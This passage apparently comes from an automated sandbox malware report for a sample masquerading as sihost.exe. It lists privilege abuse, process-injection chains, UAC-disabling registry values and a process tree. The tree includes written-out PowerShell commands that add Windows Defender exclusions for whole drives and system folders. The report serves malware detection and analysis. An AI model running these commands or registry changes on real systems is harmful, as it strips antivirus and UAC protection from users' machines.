3488	sihost.exe
1820	sihost.exe
1504	sihost.exe
1788	sihost.exe
3664	sihost.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	443110dabe7095bf8afe27bf3dc27f60N.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	4132	sihost.exe
Token: SeDebugPrivilege	3536	sihost.exe
Token: SeDebugPrivilege	4556	sihost.exe
Token: SeDebugPrivilege	712	sihost.exe
Token: SeDebugPrivilege	2216	sihost.exe
Token: SeDebugPrivilege	3652	sihost.exe
Token: SeDebugPrivilege	4708	sihost.exe
Token: SeDebugPrivilege	3488	sihost.exe
Token: SeDebugPrivilege	1820	sihost.exe
Token: SeDebugPrivilege	1504	sihost.exe
Token: SeDebugPrivilege	1788	sihost.exe
Token: SeDebugPrivilege	3664	sihost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2944 wrote to memory of 1364	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	119
PID 2944 wrote to memory of 1364	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	119
PID 2944 wrote to memory of 1364	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	119
PID 1364 wrote to memory of 1188	1364	tmp95CC.tmp.exe	121
PID 1364 wrote to memory of 1188	1364	tmp95CC.tmp.exe	121
PID 1364 wrote to memory of 1188	1364	tmp95CC.tmp.exe	121
PID 1188 wrote to memory of 428	1188	tmp95CC.tmp.exe	122
PID 1188 wrote to memory of 428	1188	tmp95CC.tmp.exe	122
PID 1188 wrote to memory of 428	1188	tmp95CC.tmp.exe	122
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 428 wrote to memory of 536	428	tmp95CC.tmp.exe	123
PID 2944 wrote to memory of 3556	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	126
PID 2944 wrote to memory of 3556	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	126
PID 2944 wrote to memory of 1852	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	127
PID 2944 wrote to memory of 1852	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	127
PID 2944 wrote to memory of 1412	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	128
PID 2944 wrote to memory of 1412	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	128
PID 2944 wrote to memory of 1736	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	129
PID 2944 wrote to memory of 1736	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	129
PID 2944 wrote to memory of 928	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	130
PID 2944 wrote to memory of 928	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	130
PID 2944 wrote to memory of 2412	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	132
PID 2944 wrote to memory of 2412	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	132
PID 2944 wrote to memory of 2180	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	133
PID 2944 wrote to memory of 2180	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	133
PID 2944 wrote to memory of 2296	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	134
PID 2944 wrote to memory of 2296	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	134
PID 2944 wrote to memory of 3604	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	135
PID 2944 wrote to memory of 3604	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	135
PID 2944 wrote to memory of 3996	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	137
PID 2944 wrote to memory of 3996	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	137
PID 2944 wrote to memory of 1996	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	138
PID 2944 wrote to memory of 1996	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	138
PID 2944 wrote to memory of 3356	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	147
PID 2944 wrote to memory of 3356	2944	443110dabe7095bf8afe27bf3dc27f60N.exe	147
PID 3356 wrote to memory of 2600	3356	cmd.exe	150
PID 3356 wrote to memory of 2600	3356	cmd.exe	150
PID 3356 wrote to memory of 4132	3356	cmd.exe	153
PID 3356 wrote to memory of 4132	3356	cmd.exe	153
PID 4132 wrote to memory of 4640	4132	sihost.exe	154
PID 4132 wrote to memory of 4640	4132	sihost.exe	154
PID 4132 wrote to memory of 1288	4132	sihost.exe	155
PID 4132 wrote to memory of 1288	4132	sihost.exe	155
PID 4132 wrote to memory of 4748	4132	sihost.exe	156
PID 4132 wrote to memory of 4748	4132	sihost.exe	156
PID 4132 wrote to memory of 4748	4132	sihost.exe	156
PID 4748 wrote to memory of 3524	4748	tmpCA93.tmp.exe	158
PID 4748 wrote to memory of 3524	4748	tmpCA93.tmp.exe	158
PID 4748 wrote to memory of 3524	4748	tmpCA93.tmp.exe	158
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 3524 wrote to memory of 1412	3524	tmpCA93.tmp.exe	159
PID 4640 wrote to memory of 3536	4640	WScript.exe	160
PID 4640 wrote to memory of 3536	4640	WScript.exe	160
PID 3536 wrote to memory of 552	3536	sihost.exe	161

System policy modification 1 TTPs 39 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\443110dabe7095bf8afe27bf3dc27f60N.exe
"C:\Users\Admin\AppData\Local\Temp\443110dabe7095bf8afe27bf3dc27f60N.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2944
- C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:428
    - - C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp95CC.tmp.exe"
        5⤵
        Executes dropped EXE
        
        PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z0umrEhMBq.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3356
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:2600
- - C:\Users\Default User\sihost.exe
    "C:\Users\Default User\sihost.exe"
    3⤵
    - UAC bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:4132
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8db6f8fa-8cd0-4d63-8e4e-2305d4ff3c36.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4640
    - - C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        5⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:3536
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32b6c907-9c96-4103-b071-4da97fe46428.vbs"
        6⤵
        
        PID:552
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        7⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:4556
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e6dbd43-b5bb-4950-971b-c287b0c903f9.vbs"
        8⤵
        
        PID:3268
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        9⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:712
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b1781e0-c6ef-4c39-89c7-8bbb4a83abb9.vbs"
        10⤵
        
        PID:1712
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        11⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4188341-f327-4cc1-9c97-d6709a84fc82.vbs"
        12⤵
        
        PID:3184
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        13⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3652
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f5f3a6c8-5ee7-4e61-b0bf-84799ae87156.vbs"
        14⤵
        
        PID:4340
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        15⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:4708
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8101b14a-f9de-4462-af3e-a8180a871651.vbs"
        16⤵
        
        PID:4584
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        17⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3488
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a5a618ca-2692-4763-a38f-1c2cf9651010.vbs"
        18⤵
        
        PID:5016
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        19⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1820
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b176466c-79a4-4b5b-b8fc-b66c558ecc6e.vbs"
        20⤵
        
        PID:2864
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        21⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bee86bb2-5482-494c-a869-248d1a44da60.vbs"
        22⤵
        
        PID:3392
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        23⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1788
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fa2c216-6c24-4bad-a967-eccf01032b4c.vbs"
        24⤵
        
        PID:3352
        
        C:\Users\Default User\sihost.exe
        
        "C:\Users\Default User\sihost.exe"
        25⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3664
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cf74533b-9f15-428f-8fd1-ae31808bafa9.vbs"
        26⤵
        
        PID:4320
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d7ca596e-8b63-4fc6-a5fb-e338218e8215.vbs"
        26⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\tmp57EA.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp57EA.tmp.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\tmp57EA.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp57EA.tmp.exe"
        27⤵
        Executes dropped EXE
        
        PID:3516
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b17a4a77-09d3-49a6-a2b8-f3ecba8c2411.vbs"
        24⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\tmp3CC1.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp3CC1.tmp.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\tmp3CC1.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp3CC1.tmp.exe"
        25⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f215b62-abf4-441d-a9bc-a1aba033d75e.vbs"
        22⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe"
        22⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpBAE.tmp.exe"
        24⤵
        Executes dropped EXE
        
        PID:1368
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1f0c8436-49f7-4acc-b358-65b989529b96.vbs"
        20⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\tmpEE82.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpEE82.tmp.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\tmpEE82.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpEE82.tmp.exe"
        21⤵
        Executes dropped EXE
        
        PID:4464
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d3bcff55-3f66-4163-ac32-a8bf5ad4ec49.vbs"
        18⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpD3D5.tmp.exe"
        21⤵
        Executes dropped EXE
        
        PID:5112
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8c9b29b3-5d1e-42ec-9374-a7fb81fe0eb5.vbs"
        16⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\tmpB64B.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpB64B.tmp.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\tmpB64B.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpB64B.tmp.exe"
        17⤵
        Executes dropped EXE
        
        PID:3352
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a8308a4f-d02f-4e39-95aa-da52a7dccd37.vbs"
        14⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp.exe
        
